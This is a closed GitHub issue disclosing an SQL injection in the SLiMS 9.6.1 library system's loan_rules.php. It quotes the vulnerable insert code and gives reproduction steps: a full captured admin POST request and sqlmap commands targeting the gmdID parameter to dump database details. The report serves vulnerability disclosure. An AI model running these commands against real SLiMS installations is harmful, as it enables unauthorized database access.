Skip to content

[Security Bugs] SQL Injection at loan_rules.php #205

Closed
@komangsughosa

Description

@komangsughosa

The bug

A SQL Injection exists in admin/modules/circulation/loan_rules.php at the code below

/* RECORD OPERATION */
if (isset($_POST['saveData'])) {
    $data['member_type_id'] = $_POST['memberTypeID'];
    $data['coll_type_id'] = $_POST['collTypeID'];
    $data['gmd_id'] = $_POST['gmdID'];
    $data['loan_limit'] = trim($_POST['loanLimit']);
    $data['loan_periode'] = trim($_POST['loanPeriode']);
    $data['reborrow_limit'] = trim($_POST['reborrowLimit']);
    $data['fine_each_day'] = trim($_POST['fineEachDay']);
    $data['grace_periode'] = trim($_POST['gracePeriode']);
    $data['input_date'] = date('Y-m-d');
    $data['last_update'] = date('Y-m-d');
    // create sql op object
    $sql_op = new simbio_dbop($dbs);
    if (isset($_POST['updateRecordID'])) {
        /* UPDATE RECORD MODE */
        // remove input date
        unset($data['input_date']);
        // filter update record ID
        $updateRecordID = (integer)$_POST['updateRecordID'];
        // update the data
        $update = $sql_op->update('mst_loan_rules', $data, 'loan_rules_id='.$updateRecordID);
        if ($update) {
            toastr(__('Loan Rules Successfully Updated'))->success();
            echo '<script language="Javascript">parent.jQuery(\'#mainContent\').simbioAJAX(parent.jQuery.ajaxHistory[0].url);</script>';
        } else { toastr(__('Loan Rules FAILED to Updated. Please Contact System Administrator')."\nDEBUG : ".$sql_op->error)->error(); }
        exit();
    } else {
        /* INSERT RECORD MODE */
        $insert = $sql_op->insert('mst_loan_rules', $data); // BUG HERE
        if ($insert) {
            toastr(__('New Loan Rules Successfully Saved'))->success();
            echo '<script language="Javascript">parent.jQuery(\'#mainContent\').simbioAJAX(\''.$_SERVER['PHP_SELF'].'\');</script>';
        } else { toastr(__('Loan Rules FAILED to Save. Please Contact System Administrator')."\n".$sql_op->error)->error(); }
        exit();
    }
    exit();
} 

To Reproduce

Steps to reproduce the behavior:

  1. Login as admin or user that has access to circulation

  2. make sure burp suit is on to capture the request such as below:

slims-sqli0
  1. save the request into a file (example.req)

  2. run the test with sqlmao with the command sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql

  3. voila

slims-sqli1

example.req

POST /slims9_bulian-9.6.1/admin/modules/circulation/loan_rules.php?action=detail&ajaxload=1 HTTP/1.1
Host: localhost
Content-Length: 1195
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypqBOyIslkQAaoPCi
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=circulation
Accept-Encoding: gzip, deflate
Accept-Language: id,en-US;q=0.9,en;q=0.8,ru;q=0.7
Cookie: SenayanAdmin=d79m01ubrn9d8cagafoflttg3m; admin_logged_in=1; SenayanMember=q0e3uf77qcmobchek4aciibpul; PHPSESSID=rh1hmcqfrm2a33e96b5lmtujn0
Connection: close

------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="csrf_token"

98420c7b2b5656890daf0f80b7756a6bb63fac37cb8ad1ac40a7b3ab4cde54c9
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="form_name"

mainForm
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="memberTypeID"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="collTypeID"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="gmdID"

0
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="loanLimit"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="loanPeriode"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="reborrowLimit"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="fineEachDay"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="gracePeriode"

1
------WebKitFormBoundarypqBOyIslkQAaoPCi
Content-Disposition: form-data; name="saveData"

Save
------WebKitFormBoundarypqBOyIslkQAaoPCi--

Screenshots

proof-of-concept current database

command to run sqlmap -r example.req --level 5 --risk 3 -p gmdID --random-agent --dbms=mysql --current-db
slims-sqli2

versions

  • Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86_64)
    Slims Version: slims9_bulian-9.6.1

notes

added comment of the bug. last edit at 18 August 2023 21.12 GMT+7

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions